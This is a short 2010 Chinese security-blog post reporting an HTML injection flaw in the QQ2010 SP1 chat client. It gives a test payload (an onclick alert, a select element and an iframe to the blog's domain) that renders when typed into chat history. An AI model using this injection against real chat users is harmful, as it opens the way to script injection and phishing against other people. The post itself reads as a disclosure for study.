QQ2010 SP1版本出现重大安全问题

2010年07月28日 | category

学习笔记| 坏人咖啡

以下是来自QQ微博的内容，大家可以在向聊天记录中输入以下内容，然后点开聊天记录就可以看到效果了。

测试代码：

[html]
<input onclick=’alert(huairen.me)’/>
<select><option>huairen.me<option></select>
<iframe src=’ http://huairen.me’ width=200 height=200></iframe>
[/html]

效果图：

貌似这是由于划词搜索造成的。

本文只用于学习研究，请勿用于其它用途。

所属分类: 学习笔记
Tags: 2010, QQ, 安全, 问题

« IE6 / 7 Remote Dos vulnerability

Phpcms2008 SP3 SQL注入漏洞 »

没有评论

暂无评论

RSS feed for comments on this post.

对不起，该文章的评论被关闭了！

文章分类
热门标签
- 0DAY 360 bypass dreamhost ecshop google IE ie6 Linux mysql nginx php pin Python QQ Remote sql ubuntu windows XSS 人人网卸载后台命令咖啡备份字典微博忙提权攻击文件旁注本地注入源码漏洞爱情瑞星百度破解解析跨域跨站钓鱼
随机文章
文章归档
Users
- 登录

QQ2010 SP1版本出现重大安全问题

没有评论

文章分类

热门标签

随机文章

文章归档

Users